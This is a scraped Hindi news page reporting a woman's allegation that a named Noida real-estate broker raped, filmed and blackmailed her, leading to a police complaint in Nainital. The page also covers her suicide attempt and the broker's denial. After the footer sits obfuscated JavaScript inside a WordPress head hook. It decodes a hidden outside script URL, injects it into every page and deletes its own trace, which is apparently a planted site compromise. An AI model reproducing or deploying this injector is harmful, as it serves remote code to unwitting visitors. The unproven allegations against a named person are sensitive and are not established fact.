Saturday, July 13, 2024
Google search engine
Homeउत्तराखंडउत्तराखंड: नोएडा के रियल एस्टेट ब्रोकर पर युवती ने लगाया ब्लैकमेलिंग यौन...

उत्तराखंड: नोएडा के रियल एस्टेट ब्रोकर पर युवती ने लगाया ब्लैकमेलिंग यौन शोषण और रेप करने का आरोप! मुकदमा हुआ दर्ज

उत्तर प्रदेश के नोएडा से एक गंभीर मामला सामने आ रहा है जहां एक युवती ने नोएडा के रियल एस्टेट ब्रोकर पर ब्लैकमेलिंग यौन शोषण और रेप करने का आरोप लगाया है और जिसकी शिकायत नैनीताल जिले के एसएसपी से की गयी है । एसएसपी के आदेश पर कालाढूंगी थाने में आरोपी ब्रोकर के खिलाफ ज़ीरो एफआईआर दर्ज़ कर ली गयी है । मामले के अनुसार मथुरा की एक युवती नोएडा की एक रियल एस्टेट कंपनी में सेल्स एग्जीक्यूटिव की नौकरी जॉइन करती है । जहां उसकी मुलाक़ात रियल एस्टेट ब्रोकर से होती है जो युवती से प्रोजेक्ट लेने के बहाने फोन पर बात करने लगता है और एक दिन प्रोजेक्ट के नाम पर युवती को लेकर फ्लेट में पहुंचता है और प्रोजेक्ट सेलिब्रेशन का बहाना करते हुए युवती को ड्रिंक्स ऑफर करता है काफी प्रेशर देने पर युवती ड्रिंक्स ले लेती है जिसके बाद रियल एस्टेट ब्रोकर उस युवती के साथ उसकी रजामंदी के खिलाफ जबर्दस्ती शारीरिक संबंध बना लेता है । दूसरे दिन जब युवती को होश आता है तो  रियल एस्टेट ब्रोकर माफी मांगते हुए प्यार का हवाला देता है और कई महीनों तक युवती से दोस्ती प्यार के नाम पर रिश्ता बनाए रखता है लेकिन कुछ ही दिनों बाद रसूख और अय्याशी में डूबा रसिया ब्रोकर नयी युवती से संबंध बना लेता है जिस वजह से पुराने रिश्ते में दरार आ जाती है लेकिन तब तक रियल एस्टेट ब्रोकर युवती की अश्लील विडियो बना चुका होता है और फिर युवती को ब्लैकमेल करने का सिलसिला शुरू होता है जिसके बाद युवती डिप्रेशन में चली जाती है और आत्महत्या का प्रयास भी करती है जिसके बाद पड़ोसी के द्वारा युवती को नजदीकी अस्पताल पहुंचाया जाता है । स्वस्थ हो जाने के बाद युवती मथुरा लौट जाती है लेकिन रियल एस्टेट ब्रोकर से पीछा नहीं छूटता है वो युवती के परिवारवालों को धमकाकर युवती को घर से निकलवा देता है जिसके बाद युवती वापस नोएडा पहुँचती है और फ्री लांसिंग करने लगती है ।  कुछ दिनों के बाद रियल एस्टेट ब्रोकर फिर से युवती को अपने चंगुल में फंसा लेता है और युवती किसी तरह भाग कर नैनीताल के कालाढुंगी थाने में पहुँचती है जहां वो कुलदीप कत्याल के खिलाफ शिकायत करती है और उत्तराखंड पुलिस आरोपी कुलदीप कत्याल पर एफआईआर दर्ज़ करती है।

युवती के अनुसार कुलदीप कत्याल नाम का रियल एस्टेट ब्रोकर एक रसूखदार और पहुँच वाला व्यक्ति है जो अधिकारियों से संबंध बनाए रखता है क्योंकि कई भ्रस्ट अधिकारियों को ये पैसे और लड़कियां मुहैया कराता है जिससे इसके खिलाफ कभी भी कोई कार्यवाही नहीं होती । युवती कहना है कि पर्दाफाश होते ही रसिया ब्रोकर कुलदीप कत्याल उसकी हत्या भी करवा सकता है जिस कारण उसने एफआईआर नोएडा से आकर नैनीताल में करवाई है ताकि वह सुरक्षित रह सके ।इधर जब इस मामले में रिपोर्टर ने कुलदीप कत्याल से संपर्क साधा तो उसने कहा कहा कि युवती उस पर बेबुनियाद आरोप लगा रही है उसका उस युवती से कोई संबंध नहीं है और उसने इस पूरे मामले को ब्लैकमेलिंग बताते हुए कैलाश सती की तरफ मोड़ दिया और इसी बीच फोन काट दिया रिपोर्टर ने जब दोबारा कांटैक्ट करने की कोशिश की तो कुलदीप कत्याल ने फोन ही नहीं उठाया।

गौरतलब है कि ये वही कुलदीप कत्याल रियल एस्टेट ब्रोकर है, जिसकी खबर आप पहले भी देख चुके हैं, जिसमें उत्तराखंड के अधिकारियों से अपनी करीबी का भौकाल दिखाकर रुतबा कायम करने वाला ये रियल स्टेट ब्रोकर कुलदीप कत्याल कैलाश सती और उनके सहयोगियों से लाखों की वसूली कर चुका है । रसिया ब्रोकर कुलदीप कत्याल मुरादाबाद का रहने वाला है जो एक  आपराधिक पृष्ठ भूमि का व्यक्ति है जिस पर आईपीसी की धारा 420,323,504,506,325 में कई मुकदमें पहले से ही दर्ज़ है।

बहरहाल गुण्डा मुक्त यूपी की बेटी फिलहाल एक ब्रोकर के खौफ से उत्तराखंड में शरण लेने पर मजबूर है, और न्याय के लिए यूपी पुलिस के साथ उत्तराखंड पुलिस से भी गुहार लगा रही है, युवती के अनुसार यूपी जाने पर कुलदीप कत्याल से उसे जान का खतरा है । कुलदीप कत्याल खुद को बचाने के लिए कुछ भी कर सकता है और किसी भी हद तक जा सकता है । वहीं देखना ये खास होगा कि उत्तराखंड पुलिस यूपी की इस बेटी को कैसे न्याय दिला पाती है।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>